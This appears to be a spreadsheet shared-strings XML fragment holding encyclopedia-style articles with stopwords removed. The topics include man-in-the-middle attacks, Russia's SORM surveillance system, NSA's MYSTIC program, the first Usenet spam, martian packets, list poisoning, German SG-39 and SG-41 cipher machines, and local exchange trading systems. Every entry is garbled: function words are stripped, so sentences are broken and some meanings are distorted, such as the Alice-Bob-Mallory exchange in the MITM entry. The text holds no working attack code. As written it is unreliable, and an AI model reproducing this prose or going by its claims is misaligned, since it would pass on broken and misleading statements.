    <t>Man-in-the-middle attack</t>
  </si>
  <si>
    <t>cryptography computer security, man-in-the-middle, monster-in-the-middle, machine-in-the-middle, monkey-in-the-middle, meddler-in-the-middle, manipulator-in-the-middle (mitm), person-in-the-middle (pitm) adversary-in-the-middle (aitm) attack cyberattack attacker secretly relays possibly alters communications parties believe directly communicating other, attacker inserted parties. example mitm attack active eavesdropping, attacker makes independent connections victims relays messages make believe talking directly private connection, fact entire conversation controlled attacker. attacker must able intercept relevant messages passing victims inject ones. this straightforward many circumstances; example, attacker within reception range unencrypted wi-fi access point could insert man-in-the-middle. aims circumvent mutual authentication, mitm attack succeed attacker impersonates endpoint sufficiently well satisfy expectations. most cryptographic protocols include form endpoint authentication specifically prevent mitm attacks. example, authenticate parties using mutually trusted certificate authority. example suppose alice wishes communicate bob. meanwhile, mallory wishes intercept conversation eavesdrop optionally deliver false message bob. first, alice asks public key. sends public alice, mallory able intercept mitm attack begin. mallory sends alice forged message appears originate bob, instead includes mallory's public key. alice, believing public bob's, encrypts message mallory's sends enciphered message back bob. mallory intercepts, deciphers message using private key, possibly alters wants, re-enciphers using public intercepted originally tried send alice. when receives newly enciphered message, believes came alice. alice sends message bob, intercepted mallory: alice bob, alice. give key." mallory mallory relays message bob; cannot tell really alice: alice mallory bob, alice. give key." responds encryption key: alice mallory [bob's key] mallory replaces bob's own, relays alice, claiming bob's key: alice [mallory's key] mallory alice encrypts message believes bob's key, thinking read alice "meet stop!" [encrypted mallory's key] mallory however, actually encrypted mallory's key, mallory decrypt read modify desired), re-encrypt bob's key, forward bob: alice mallory "meet river!" [encrypted bob's key] thinks message secure communication alice.this example shows need alice ensure truly using other's public keys, rather public attacker. otherwise, attacks generally possible, principle, message sent using public-key technology. variety techniques help defend mitm attacks. defense detection mitm attacks prevented detected means: authentication tamper detection. authentication provides degree certainty given message come legitimate source. tamper detection merely shows evidence message altered. authentication cryptographic systems secure mitm attacks provide method authentication messages. most require exchange information (such public keys) addition message secure channel. such protocols, often using key-agreement protocols, developed different security requirements secure channel, though attempted remove requirement secure channel all.a public infrastructure, transport layer security, harden transmission control protocol mitm attacks. structures, clients servers exchange certificates issued verified trusted third party called certificate authority (ca). original authenticate subject mitm attack, certificates issued used authenticate messages sent owner certificate. mutual authentication, server client validate other's communication, covers ends mitm attack. server client's identity verified deemed invalid, session end. however, default behavior connections authenticate server, means mutual authentication always employed mitm attacks still occur. attestments, verbal communications shared value zrtp), recorded attestments audio/visual recordings public hash used ward mitm attacks, visual media much difficult time-consuming imitate simple data packet communication. however, methods require human loop order successfully initiate transaction. corporate environment, successful authentication indicated browser's green padlock) always imply secure connection remote server. corporate security policies might contemplate addition custom certificates workstations' browsers order able inspect encrypted traffic. consequence, green padlock indicate client successfully authenticated remote server corporate server/proxy used ssl/tls inspection. http public pinning (hpkp), sometimes called "certificate pinning," helps prevent mitm attack certificate authority compromised, server provide list "pinned" public hashes first transaction. subsequent transactions require keys list must used server order authenticate transaction. dnssec extends protocol signatures authenticate records, preventing simple mitm attacks directing client malicious address. tamper detection latency examination potentially detect attack certain situations, long calculations lead tens seconds like hash functions. detect potential attacks, parties check discrepancies response times. example: parties normally take certain amount time perform particular transaction. transaction, however, take abnormal length time reach party, could indicative third party's interference inserting additional latency transaction. quantum cryptography, theory, provides tamper-evidence transactions no-cloning theorem. protocols based quantum cryptography typically authenticate part classical communication unconditionally secure authentication scheme. example wegman-carter authentication. forensic analysis captured network traffic suspected attack analyzed order determine whether attack and, determine source attack. important evidence analyze performing network forensics suspected attack includes: address server name server x.509 certificate server whether certificate self signed whether certificate signed trusted certificate authority whether certificate revoked whether certificate changed recently whether clients, elsewhere internet, received certificate notable instances stingray phone tracker cellular phone surveillance device mimics wireless carrier cell tower order force nearby mobile phones cellular data devices connect tracker relays communications back forth cellular phones cell towers.in 2011, security breach dutch certificate authority diginotar resulted fraudulent issuing certificates. subsequently, fraudulent certificates used perform mitm attacks.in 2013, nokia's xpress browser revealed decrypting https traffic nokia's proxy servers, giving company clear text access customers' encrypted browser traffic. nokia responded saying content stored permanently, company organizational technical measures prevent access private information.in 2017, equifax withdrew mobile phone apps following concern mitm vulnerabilities.other notable real-life implementations include following: dsniff first public implementation mitm attacks sshv1 fiddler2 http(s) diagnostic tool impersonation google qaznet trust certificate superfish malware forcepoint content gateway used perform inspection traffic proxy comcast uses mitm attacks inject javascript code party pages, showing messages pages 2015 kazakhstan man-in-the-middle attack also references external links finding hidden threats decrypting (pdf). sans institute.</t>
  </si>
  <si>
    <t>Marabunta (software)</t>
  </si>
  <si>
    <t>marabunta fully distributed software application anonymous p2p. main goal fight internet censorship assuring freedom speech. peer-to-peer platform information exchange among nodes anonymous based several communication algorithms called "order chaos" found massive social organizations colonies. project founded university zaragoza, spain, developed promoted students computing engineering although development teams users many different places shown interest, perhaps attracted ideological aims project. software available spanish english, website also available english. marabunta uses graphical widget toolkit, allowing used linux microsoft windows. released general public license, marabunta free software. purpose marabunta implementation ideas explained "free nets project developed ideas mind: avoiding censure: communication people avoiding central servers allowed. free censure attacks, commonly launched many governments corporations want control communications. anonymity: degree anonymous communication made possible, information accessed without knowledge original source. motives development: marabunta first project kind developed spain (first version released 2005). still, software potential people anywhere world, especially countries little freedom speech. features there many potential services marabunta. text message interchange first service. could taken platform telegram distribution, computer works host server. host: messages sent, active nodes sought, etc. server: text messages requests increase connectivity nodes routed network using broadcast forwarding method.there four message distribution lists, receivers receive messages sent list interested general, technology, philosophy, politics. content filters allowed messages certain patterns displayed. this specially useful searching specific information marabunta selects potentially interesting messages. connections generated traffic uses udp/ip protocols. avoiding setting connections nodes lets traffic flow network operational redundancy every node used. moreover, protocol could seen increasing anonymity need validate source hosts receive datagram. port-forwarding nats marabunta support hole punching, users behind nats establish port forwarding route router know port node internal forward arriving datagrams. references external links english) marabunta home page (software display spanish default. english software, click "opciones generales", area "seleccion idioma" (bottom window), change "castellano" "english").</t>
  </si>
  <si>
    <t>Markets in Crypto-Assets</t>
  </si>
  <si>
    <t>markets crypto-assets (mica) proposed regulation law. intended help streamline distributed ledger technology (dlt) virtual asset regulation european union (eu) whilst protecting users investors. title full name september 2020 proposal "proposal regulation european parliament council markets crypto-assets, amending directive (eu) 2019/1937 com/2020/593 final". mica part digital finance package intends transform european economy coming decades. function mica provides legal certainty around crypto assets cryptocurrencies, security tokens stablecoins. similar europe’s markets financial instruments directive (mifid), legal framework securities markets, investment intermediaries trading venues. external links mica europa.eu references</t>
  </si>
  <si>
    <t>SORM</t>
  </si>
  <si>
    <t>system operative investigative activities (sorm; russian: система оперативно-разыскных мероприятий) technical specification lawful interception interfaces telecommunications telephone networks operating russia. current form specification enables targeted surveillance telephone internet communications. initially implemented 1995 allow access surveillance data fsb, subsequent years access widened enforcement agencies. history sorm-1 sorm first implemented 1995, requiring telecommunications operators install fsb-provided hardware allowing agency monitor users’ communications metadata content, including phone calls, email traffic browsing activity, despite internet penetration rate time. sorm-2 july 1998 system replaced sorm‑2. under sorm‑2, russian internet service providers (isps) must install special device servers allow track credit card transactions, email messages use. device must installed isp's expense. estimated cost $10,000–30,000. other reports note isps install direct communications lines costs implementing required changes excess $100,000.in july 2000, russia's minister information technology communications leonid reiman issued order "concerning introduction technical means ensuring investigative activity (sorm) phone, mobile wireless communication radio paging networks" stating longer required provide telecommunications internet companies documentation targets interest prior accessing information.in august 2014, sorm-2 usage extended monitoring social networks, chats forums, requiring operators install sorm probes networks. sorm-3 ministerial order russian ministry communications april 2014 introduced requirements wiretapping system sorm-3. telecommunications operators required install compliant equipment march 2015.according regulations russian ministry communications, sorm-3 equipment supports following selectors targeted surveillance: single ipv4 ipv6 address ipv4 ipv6 networks identified address mask user within telecom operator's system, supporting globbing symbols (wildcards) email address, targeted user connects pop3, smtp imap4; connections protected cryptography specifically excluded email address, targeted user connects webmail system predefined list services: mail.ru; yandex.ru; rambler.ru; gmail.com; yahoo.com; apport.ru; rupochta.ru; hotbox.ru; again, connections protected cryptography specifically excluded user's phone number imsi imei address user's equipment uinthe equipment deep packet inspection (dpi) capability. architecture deployment russia uses deep packet inspection (dpi) nationwide scale, part infrastructure used sorm. some mobile networks additionally filter traffic.the sorm device recommended named omega. equipment cellebrite appears use. sorm also enables mobile control points, laptop plugged directly communication hubs immediately intercept record operator's traffic.roskomnadzor, federal executive body responsible media control, reported several local isps fined government failed install fsb-recommended sorm devices. access government agencies january 2000, first week office, president vladimir putin amended allow seven federal security agencies (next fsb) access data gathered sorm. newly endowed agencies included: russia's police russian police federal protective service border patrol customs ministry internal affairs kremlin regiment presidential security service parliamentary security services warrant notification regulations acquisition communications entitled security services general requires court warrant, time allowed start wiretapping obtaining warrant. warrant also required communications content, metadata (communicating parties, time, location etc.), obtained without warrant.in cases operative required eavesdropping warrant, obligation show anyone. telecom providers right demand provide warrant, denied access surveillance boxes. security service calls special controller headquarters connected protected cable directly sorm device installed network.since 2010, intelligence officers wiretap someone's phones monitor internet activity based received reports individual preparing commit crime. they back allegations formal criminal charges suspect. according 2011 ruling, intelligence officers right conduct surveillance anyone claim preparing call "extremist activity." zakharov russia december 2015, european court human rights ruled case legality russian sorm legislation. unanimous grand chamber decision, court ruled russian legal provisions provide adequate effective guarantees arbitrariness risk abuse inherent system secret surveillance." noted risk particularly high system secret services police direct access, technical means, mobile telephone communications." ruled therefore, legislation violated article european convention human rights. yarovaya july 2016, president vladimir putin signed sets legislative amendments commonly referred yarovaya law, author, irina yarovaya, leading member ruling party united russia. regulations took effect july 2018. according amendments, internet telecom companies required disclose communications metadata, well "all information necessary," authorities, request without court order. also lawful interception mass surveillance russia sovereign internet references external links media russian spies, they've mail regulations allow security services into systems internet providers. sharon lafraniere, washington post, march 2002 russia: surveillance communications. statewatch, june 2000. takes internet sorm, mother jones magazine, february 2000. sorm russia's brother...., issue #21, numbers oddities newsletter, 1999 december official instructions утверждении типовых требований плану мероприятий внедрению технических средств проведения оперативно-разыскных мероприятий january 2008 russian) утверждении требований сетям электросвязи проведения оперативно-разыскных мероприятий. часть общие требования january 2008 russian)</t>
  </si>
  <si>
    <t>SOL Project</t>
  </si>
  <si>
    <t>project innovative french complementary currency designed promote "solidarity economy". project financed european commission pilot tested nord-pas-de-calais, île-de-france brittany. initiated patrick viveret dominique picard received praise president jacques chirac. supporters believe raise standard living income participants building local economy. also ethical banking references external links website: http://www.sol-reseau.org/ social economy round analysis, european commission report</t>
  </si>
  <si>
    <t>Martha Siegel (spammer)</t>
  </si>
  <si>
    <t>laurence canter (born june 1953) martha siegel (april 1948 september 2000) partners husband-and-wife firm lawyers posted first massive commercial usenet spam april 1994. this event came shortly national science foundation lifted unofficial commercial speech internet, marks net's early period views, original netiquette could still enforced. canter siegel first usenet spammers. "green card" spam, however, first commercial usenet spam, unapologetic authors seen precedent modern global practice spamming. green card spam early 1994, canter siegel contracted leigh benson write program advertise usenet, benson unable write software. april 1994 used perl script written programmer known "jason", generate advertisements service enrolling people "green card lottery". this government program allocates limited quantity "green cards" certain non-citizens, allowing stay work country. lawyers offered necessary paperwork fee.canter siegel sent advertisement, subject "green card lottery final one?", least 5,500 usenet discussion groups, enormous number time. rather cross-posting single copy message multiple groups, reader would (considered common courtesy posting message group), posted separate postings newsgroup, reader would group read. their internet service provider, internet direct, received many complaints mail servers crashed repeatedly next days; promptly terminated service. despite directed lawyers, posted another advertisement 1,000 newsgroups june 1994. this time, arnt gulbrandsen together software "cancelbot" trawl usenet kill messages within minutes. couple claimed december 1994 interview gained 1,000 clients "made $100,000 cost pennies".on 1994, couple established company called cybersell. they promoted experts then-new business online retail february 1995 undertook first known commercial spamming behalf clients (so-called "spam hire"). they wrote book titled make fortune information superhighway: everyone's guerrilla guide marketing internet other on-line services (isbn 0-06-272065-1). 1997, martha siegel published revised version titled make fortune internet (isbn 0-06-273466-0) name only. 1997, supreme court tennessee disbarred canter part illegal advertising practices. william hunt iii, tennessee board professional responsibility, said time believed first time lawyer disciplined internet advertising practices. cybersell dissolved default march 1998 repeatedly failing file annual reports incorporation fees. also cybersell, inc. cybersell, inc. references external links delisle, green card lottery last call 1994 usenet post giving background canter siegel hilty, lost, 1996 everett-church, "the spam that started all", wired magazine, april 1999 sharael feist, "the father modern spam speaks", cnet news, march 2002 john moran, "the spam heard around world", hartford courant, june 2002 neil swidey, "spambusters", boston globe, october 2003 campbell, k.k. (october 1994). "chatting with martha siegel internet's infamous canter siegel". electronic frontier foundation. archived original november 2007. retrieved september 2010.</t>
  </si>
  <si>
    <t>STU-II</t>
  </si>
  <si>
    <t>stu-ii (standard telephone unit secure telephone developed u.s. national security agency. permitted users secure communications, time-shared (e.g.: rotating) basis. made defense communications, nutley, jersey. partner northern telecom. according information display 2005 nsa's national cryptologic museum, stu-ii 1980s present. uses linear predictive coding algorithm lpc-10 kilobits/second digitize voice, "key distribution center" (kdc) management. display also stated stu-ii standard narrow band secure telephone. stu-ii replaced stu-i, ky-3 navajo last secure telephone briefcase, built 1980s senior government officials traveling. navaho also used lpc-10. some stu-ii units produced. external links delusion.org national cryptologic museum pictures pictures president reagan using stu-ii phone also stu-iii scip</t>
  </si>
  <si>
    <t>Martian packet</t>
  </si>
  <si>
    <t>martian packet packet seen public internet contains source destination address reserved special-use internet assigned numbers authority (iana) defined 1812, appendix glossary (martian address filtering). public internet, packet either spoofed source address, cannot actually originate claimed, packet cannot delivered. requirement found 1812, section 5.3.7 (martian address filtering). martian packets commonly arise address spoofing denial-of-service attacks, also arise network equipment malfunction misconfiguration host.in linux terminology, martian packet packet received kernel specific interface, routing tables indicate source expected another interface.the name derived packet mars, meaning packet seems earth. ipv4 ipv6 ipv4 ipv6, martian packet source address, destination address, within special-use ranges. transition mechanisms 6to4 6to4 ipv6 transition technology ipv6 address encodes originating ipv4 address every ipv4 corresponding, unique ipv6 prefix. because 6to4 relays encoded value determining site 6to4 tunnel, 6to4 addresses corresponding ipv4 martians routable never appear public internet. teredo tunneling teredo another ipv6 transition technology encodes originating ipv4 address ipv6 address. however, encoding format encodes teredo server address tunnel information ipv4 client address. thus definable prefixes specific 2001:0::/32 teredo packets martian end-site addresses. however, possible spoof teredo packets teredo server ipv4 address martian. also bogon filtering christmas tree packet broadcast storm references</t>
  </si>
  <si>
    <t>MYSTIC</t>
  </si>
  <si>
    <t>mystic former secret program used since 2009 national security agency (nsa) collect metadata well content phone calls several countries. program first revealed march 2014, based upon documents leaked edward snowden. mystic operates legal authority executive order 12333. history mystic program started 2009, reached full capability record content phone calls entire country days, 2011. documents 2013 surveillance program could extended countries.on march 2014, existence program first revealed washington post, based upon documents leaked edward snowden. reported capability record phone calls unidentified foreign country.on 2014, website intercept published name country phone calls recorded, also identified three countries telephony metadata collected (see below). scope under sub-program mystic codenamed somalget, actively recording archiving content "virtually every" phone call thirty days. after thirty days, recorded calls overwritten newer phone calls, although concern raised start storing collected phone calls indefinitely.although analysts listen less phone calls collected mystic, millions voice clips forwarded processing storage every month.a representative american civil liberties union (aclu) criticized program, stating ability record anything wants also noted mystic first revealed surveillance operation capable monitoring recording entire nation's telecommunication system. targets 2013, collected metadata phone calls five entire countries, according report intercept 2014: mexico, philippines, kenya, bahamas initially unidentified country.for latter countries, collected metadata, also content phone calls. this took place somalget sub-program. documents purport unlawful mass surveillance bahamas resulted apprehension narcotics traffickers. government also shared information bahamas, despite indicating would. afghanistan march 2014, former deputy director john inglis already said country iraq, analysis published website cryptome identified country afghanistan. several days later, wikileaks also reported afghanistan country collected nearly phone calls.on september 2015, director national intelligence james clapper said disclosure reporters believed mystic and/or somalget program, afghan government immediately close important intelligence program, "was single important source force protection warning people afghanistan", according clapper. also global surveillance disclosures (2013–present) list government mass surveillance projects references</t>
  </si>
  <si>
    <t>Sakawa</t>
  </si>
  <si>
    <t>sakawa ghanaian term illegal practices combine modern internet-based fraud african traditionalist rituals. term word sakawa hausa word means putting inside, make money. rituals, mostly form sacrifices, intended spiritually manipulate victims scammer's fraud successful. term sakawa referred specific online scams since broadened include types online frauds scams mainly targeting foreigners. scammers flaunt stylish clothes, luxury cars, enormous wealth, order promote act. impoverished areas, seen survival some.scammers involved practice call sakawa boys. culture developed around sakawa influenced music clothing brands. movies depicting lifestyle become popular, movement ghanaian filmmaker socrate safo. also crime ghana nigerian scam references external links sakawa boys, documentary phenomenon. look real african social engineers, article sakawa culture. anatomy sakawa scam, article detailing sakawa type frauds.</t>
  </si>
  <si>
    <t>List poisoning</t>
  </si>
  <si>
    <t>term list poisoning refers poisoning e-mail mailing list invalid e-mail addresses. industry uses once mailing list poisoned number invalid e-mail addresses, resources required send message list increased, even though number valid recipients not. poison spammer's mailing list, force spammer exhaust resources send e-mail, theory costing spammer money time. poisoning spammers' mailing lists usually done blacklists submitting fake information email submit style offers, posting invalid email addresses usenet forum page spammers believed harvest email addresses mailing lists. vulnerabilities syntactically invalid email addresses used poison mailing list could easily filtered spammers, using email addresses syntactically correct could cause problems mail server responsible email address. implementations spam poisoning systems avoided, spammers learn location could automatically filter address containing "spampoison.com"). spammers often steal resources efficiency mailing places little financial burden spammer. also anti-spam techniques (e-mail) address munging botnet e-mail address harvesting spamtrap stopping e-mail abuse external links list poisoning code written perl. list poisoning code written php. simple list poisoning code written bash shell script working example. hosted list poisoning honeytrap spampoison</t>
  </si>
  <si>
    <t>Schlüsselgerät 41</t>
  </si>
  <si>
    <t>schlüsselgerät ("cipher machine 41"), also known sg-41 hitler mill, rotor cipher machine, first produced 1941 nazi germany, designed potential successor enigma machine. limited abwehr (military intelligence) towards world history sg-41 created order heereswaffenamt (inspectorate 7/vi organisation) collaboration german cryptographer fritz menzer wanderer, leading typewriter manufacturer. machine also acquired nickname "hitler mill" large crank attached side unit. instead using lampboard like enigma, sg-41 printed plaintext ciphertext message onto paper tapes. wartime shortages light metals aluminium magnesium, sg-41 weighed approximately 13.5 kilograms lb), made unsuitable front lines.menzer intended sg-41 fully replace enigma, considered longer secure; luftwaffe heer ordered around 11,000 units.a total 1,000 units produced. various sources reported production figures units materiel shortages, production halted 1,000 units, considered heavy front. december 1943, general fritz thiele ordered production cease 1944. beginning october 1944, first deliveries abwehr began. final months war, sg-41 used instead abwehr enigma. function functionally, machine greater similarities boris hagelin c-series. sg-41 encryption rotors, compared enigma, either three four, addition number advanced features, making much resistant cryptanalysis enigma contemporary hagelin machines. while enigma rotors advanced letter enciphered, sg-41's wheels interacted moved irregularly, forwards backwards. similar functionality adopted mass-produced cipher machine 1952 advent hagelin cx-52. cryptanalysis allied codebreakers bletchley park considered device "mystery". only handful messages able deciphered war, namely messages depth" i.e. encrypted key. inner workings device unclear war, possible perform systematic cryptanalysis messages. allied codebreakers referred "remarkable machine". sg-41z final months war, additional units built, referred sg-41z. this model allowed numbers enciphered used luftwaffe weather reports. find near aying 2017, hobbyist treasure hunters found sg-41 using metal detector forest near bavarian city aying, buried approximately centimetres deep. hobbyists donated find deutsches museum munich instead selling privately. museum intends conserve current condition display permanent exhibit, bild schrift codes. also schlüsselgerät references</t>
  </si>
  <si>
    <t>Schlüsselgerät 39</t>
  </si>
  <si>
    <t>schlüsselgerät (sg-39) electrically operated rotor cipher machine, invented german fritz menzer world device evolution enigma rotors coupled three hagelin wheels provide variable stepping rotors. three wheels stepped encipherment. rotors stepped according normal enigma rules, except active reading station wheel prevented coupled rotor stepping. cycle normal enigma 17,576 characters. when schlüsselgerät correctly configured, cycle length {\displaystyle 2.7x10^{8}} characters, 15,000 times longer standard enigma. schlüsselgerät fully automatic, pressed, plain cipher letters printed separate paper tapes, divided five-digit groups. schlüsselgerät abandoned german forces favour schlüsselgerät technical description note: otto buggisch gave technical description cipher unit part ticom homework. gerät electrically operated cipher machine. cipher technique derived enigma cipher machine. direct current passes wheels, positions, reflector wheel wheels reverse order, unlike enigma, wheels control movement: done independent pin-wheels periods 21,23 figures distributed among possibly different configurations. wheels uniform motion, i.e. move position every letter keyed. movement wheels details, machine passed different stages development course time, specific names denoted a,b,c each three wheels moves place active sensing point relevant pin-wheel, moves then. wheels moveable rings body wheel, result that, unlike enigma, initial position body wheel determine absolutely, time clear message setting. reflector wheel pluggable like reflector wheel enigma; quickly exchanged second reflector wheel prepared reflector plugging. wheels iii, whose wiring correspond exactly enigma, adjustable rings; moved around body wheels fixed pin, which, analogy enigma, called turn-over notch, although mechanically made. opposite wheels sensing points pick turn-over notch passes. pluggable addition point input stecker like enigma stecker. following methods working possible: working wiring: given certain arrangements, being, true, certain limitations number activing pins. wheel moves above. wheel following causes movement:an active sensing point causes move place when turn-over notch ring comes sensing point, caused move next letter keyed enigma). when turn-over notch comes sensing point turns place next letter keyed time iii, double step enigma) three causes movement take effect simultaneously nevertheless moves place. there three causes movement wheel iii. active sensing-point causes move place, first above, when turn-over notch ring comes sensing point, moves place next letter keyed. just case causes movement operation simultaneously combine produce stop. working enigma wiring. pins active, pins remaining inactive. then movements identical enigma. factors also agree corresponding ones enigma interchangeable working machines possible. sensing-point also provided opposite wheel iii. turn-over notch ring touched turns place next letter keyed. movement coincides step caused results single step. thus possibility interchangeable working enigma remains. addition, machine gets fourth wheel, placed move touched. corresponds fourth wheel naval enigma used interchangeable working machine. summer 1944, karl stein okw/chi told buggisch reciprocal influencing wheels altered way. buggisch could remember details nothing fundamental principle machine described changed. interchangeable working army naval enigma remained possible. investigations periodicity case model first above, question periodicity elementary, 262=276 pure periods length 313, 950as long number active pins wheels prime this last condition laid cipher regulations; otherwise periods would broken manner easily seen.things much complicated case model investigations problem winter 1942/1943 partly successful; possible exactly calculate lengths pure periods pre-periods. estimates quite adequate practical purposes however given. buggisch could remember details somewhat investigations. extraordinary length many pre-periods (lengths thousands uncommon) complication branches remarkable. general type illustrated following diagram: circle represents pure period straight lines pre-periods. there usually several pure periods, complicated system pre-periods branching several separate figures type side side necessary give graphic representation periodicities. lower limit lengths pure periods was, remember: 8,162,700. questions periodicities case model still involved. possible calculate lengths pure periods pre-periods, alone give lower limits inconsiderable. cipher security principal weaknesses enigma follows: wheel moved uniformly wheel all, wheel moved infrequently. period comparatively small, large amount traffic day, key, reckon concurrence critical depths (this applies least army enigma; naval machine fourth wheel, days traffic spread periods). reflector wheel plugable remained unchanged years (and (5), enemy could easily establish hollerith methods example, substitution alphabets unplugged machines. number possible wheel combinations since wheels belonging machine, least case army enigma, consisted different wheels.faults already eliminated model schlüsselgerät longer appears vital. hand, however, giving adjustable rings stecker gave rise weaknesses enigma have. fact, absence stecker cannot compensated making reflector wheel pluggable; investigations enigma shown considerably difficult find steckering reflectoring wheel u.in detail, results investigations follows: inner wiring clear message setting wheels known, wiring reflector wheel arrangement found crib letters, fairly laborious process. inner wiring wheels reflector wheel known, likewise possible find clear message-setting pin-arrangement crib letters; laborious process.the above-mentioned weakness model eliminated introduction steckering adjustable rings model although done primarily quite different reason, namely make interchangeable working enigma possible. thought longer serious possibility break-in. however system still relatively small period appeared desirable destroy too. this done model making react presented technical difficulties.finally model total number periods multiplied compared introduction fourth wheel; not, true, intended primarily purpose added carry interchangeable working naval enigma. history gerät model developed early year 1939 1940 pruef waffenamt. summer 1942, prototype available pupp's laboratory pruef made firm telefonbau normalzeit (literally 'telephone standard time', later called tenovis). noteworthy feature clear-text letter keyed, corresponding cipher letter could sent simultaneously transmitter morse character. this technical point view, fairly complicated operation. machine thus like cipher teleprinter except instead 5-element alphabet ordinary morse alphabet used. maximum keying speed also current (1940s) cipher teleprinter. could however made working direct transmission, reception automatic case cipher teleprinter, done aurally operator. that many reasons automatic transmission part machine omitted later models. this done oberst kahn, director pruef department waffenamt, left, especially advocated strange principle. second model actually constructed like model designated [see 2.1.1] section above. printed clear text cipher text separate strips. buggisch january 1944 visiting pruef section planken.the change cipher-technical also made 1942. made instigation kriegsmarine laid principle newly introduced cipher machine higher permit interchangeable working enigma. army (heer wehrmacht) also adopted standpoint: first instance highest authorities issued machine, e.g. okw, army groups, gradually, production permitted, engigma machine replaced armies, finally perhaps army corps. there were, 1943 1944 various interested, many lengthy discussions arguments introduction machine. special wishes navy taken account. industrial firm complained lack material labour. owing similar difficulties, development stopped altogether time, resumed however. rate vagueness decisive authorities was, addition difficulties production, chief reason machine never completed. bibliography "ticom i-137 final report written wachtmeister otto buggisch okh/chi okw/chi" (pdf). google drive. ticom. october 1945. retrieved september 2018. references</t>
  </si>
  <si>
    <t>Local exchange trading system</t>
  </si>
  <si>
    <t>local exchange trading system (also local employment trading system local energy transfer system; abbreviated lets) locally initiated, democratically organised, not-for-profit community enterprise provides community information service records transactions members exchanging goods services using locally created currency. lets allow people negotiate value hours services, keep wealth locality created.similar trading systems around world also known community exchange systems, mutual credit trading systems, clearing circles, trade exchanges time banks. these 'metric currencies' currencies measure, opposed fiat currencies used conventional value exchange. these type alternative complementary currency.in 21st century, internet-based networks haves used link individual lets systems, national global networks. history michael linton originated term "local exchange trading system" 1983, time running comox valley letsystems courtenay, british columbia. system designed intended adjunct national currency, rather replacement called currency "green dollars" mostly used local dentist, dwindled moved away. linton started least four versions, varying degrees success, "community dollars" 2008. system's turnover first years amounted green $500,000. there lets great britain 1992. 1995 number increased 30,000 membership million turnover. 2018 university victoria undertook research archives demonstration people react ideas outside norms society. linton thought failed communicate idea adequately. lets type money makes easy pursue livelihood without previous wholesale transformation capitalism. thus regarded alternative currency movement, form political protest. after flourishing 1990s, lets movement waned. interest local currency moved designs time-based currency dollar-backed local voucher schemes. internet networks whole, movement slow adapt internet possibility networking together. reluctance engage technology, belief decentralisation/localisation lack funds contributed this.examples lets networks based free software cape town-based community exchange system (ces), march 2019 links geneva-based community forge spanish integralces.internet exchange trading system established 1998 idea spread local exchange tradings systems online establish service exchange online platform. reach critical mass users idea later abandoned. criteria lets networks facilitate exchange members providing directory offers needs allowing line interest-free credit each. members' ious logged centralised accounting system publishes directory well balances visible members. case default, loss value units absorbed equally members, makes mutual credit exchange. instance, member earn credit childcare person spend later carpentry another person network, spend first earn later.in many countries, distinction lets timebanking clear, many lets time unit account.as linton's definition, lets generally considered following five fundamental criteria: cost service: community community consent: compulsion trade disclosure: information balances available members equivalence national currency interestaccording 1996 survey letslink lets networks actually practise equivalence, groups establishing alternative systems valuation order divorce [themselves] entirely mainstream economy." michael linton stated systems "personal money" networks rather lets. operation list services offered network members together create lets scheme, trading takes place members using local currency. lets foundation virtual currency, check book, directory well transparent accounting system built trust community regulation. first lets required nothing telephone, answering machine notebook. since then, several attempts improve process software, printed notes, familiar aspects traditional currencies. local people organization trade themselves, often paying small membership cover administration costs members maintain directory offers wants help facilitate trades upon trading, members 'pay' printed notes, transaction books online, write cheques later cleared system accountant. members whose balances exceed specified limits (positive negative) obliged move balance back towards zero spending earning.lets full-fledged monetary exchange system, unlike direct barter. lets members able earn credits member spend anyone else scheme. since details worked users, much variation schemes. lets scheme avoiding payment taxation, generally groups encourage members personally undertake liabilities state taxation, including income goods services tax. number countries, various government taxation authorities examined lets along forms counter trade, made rulings concerning use. generally personal arrangements, social arrangements, hobbies pastimes, taxation implications. this generally covers vast majority lets transactions. taxation liabilities accrue tradesperson professional person provides professional services payment lets units, registered incorporated business sells part product lets units. cases, businesses generally encouraged sell service product partly lets units partly national currency, allow payment required taxation. this imply, however, situations national-currency expenditures would tax-deductible, lets must well. number countries, lets encouraged social security initiative. example, australia, peter baldwin, former minister social security keating government, encouraged lets letting welfare recipients borrow welfare entitlement urgent personal needs establish business.since commencement years ago, lets highly innovative adapting needs local communities kinds ways. example, australia, people built houses using lets place bank mortgage, freeing owner onerous interest payments. benefits lets help revitalise build community allowing wider cross-section community—individuals, small businesses, local services voluntary groups—to save money resources cooperation others extend purchasing power. other benefits include social contact, health care, tuition training, support local enterprise businesses. goal approach stimulate economies economically depressed towns goods services, little official currency: lets scheme require outside sources income stimulus. environmental benefits enhanced locals' self-reliance involve less-distance transport local goods substituted imports) evident environmental effects. moreover, diverse local economies support sustainability decreasing need assets inefficient manner satisfy external consumer demands. that also requires improving local quality life without make expenditures. lets allow much greater self-direction flexibility employment patterns mainstream, conventional economy and, particular, enable skills unemployed valued used. limitations even though lets strongly oriented towards formal market economy, disengage establishing small, cooperative exchange enclaves trust intimacy relationships cultivated. also means small range services available. lets members must economically involved outside meet needs. lets also effect return bartering abolition property. "lets currency value circulation." while lets members could decide individually change value money life develop codes live large degree, restricted ability sustain utopia. lets limited resources, need mainstream resources, might unable transfer codes network. examples local exchange trading systems exist many countries. currency exchange countries done automatically similar network. africa 2003, original founded internet-based lets cape town, south africa. 2011 grown global network spanning countries.as march 2019 following african countries active communities linked network: botswana cameroon ethiopia kenya lesotho liberia madagascar namibia nigeria south africa swaziland uganda zambia zimbabwe asia japan, fureai kippu japanese ふれあい切符: caring relationship tickets) japanese sectoral currency created 1995 sawayaka welfare foundation people could earn credits helping seniors community. australia government australia, 1989, allocated au$50,000 development letsystems, including running state conferences, production software, letsystems training pack, assistance michael linton visit western australia. 1995 letsystems australia, western australia separate systems serving population million (although actual participation tiny fraction population), making region highest lets coverage world. from around 2007, many australian lets groups started trading online using community exchange system. this system allows members sign directly, list offers wants, enter trades without assistance administrator. 2011 australia become active country community exchange system, prompting jenkin annette loudon australian community exchange system. march 2019 communities using ces. europe czech republic, multiple lets. rozleťse, operating region city brno sharing cyclos3 server smaller groups regions jeseník, ostrava beskydy. capital, prague, uses pralets.in germany, german communities network.in switzerland adaption lets, talent, established quite successfully launched 1992. this spread europe spawned many talent-groups countries.the united kingdom many lets systems, many loosely affiliated letslink operating system, north london lets. skillsbox operates online community system similar lets, letting users trade skills time credits spent within online community.the flemish part belgium many lets groups. there profit organization promoting lets: lets vlaanderen vzw. they assist local groups starting organize events, share knowledge.the suska (suska circle) hungary present major cities. south central america, caribbean 2011 around dozen lets venezuela, support national government.as march 2019, many active communities region hosted global server: argentina brazil bolivia chile colombia costa rica curaçao dominican republic ecuador 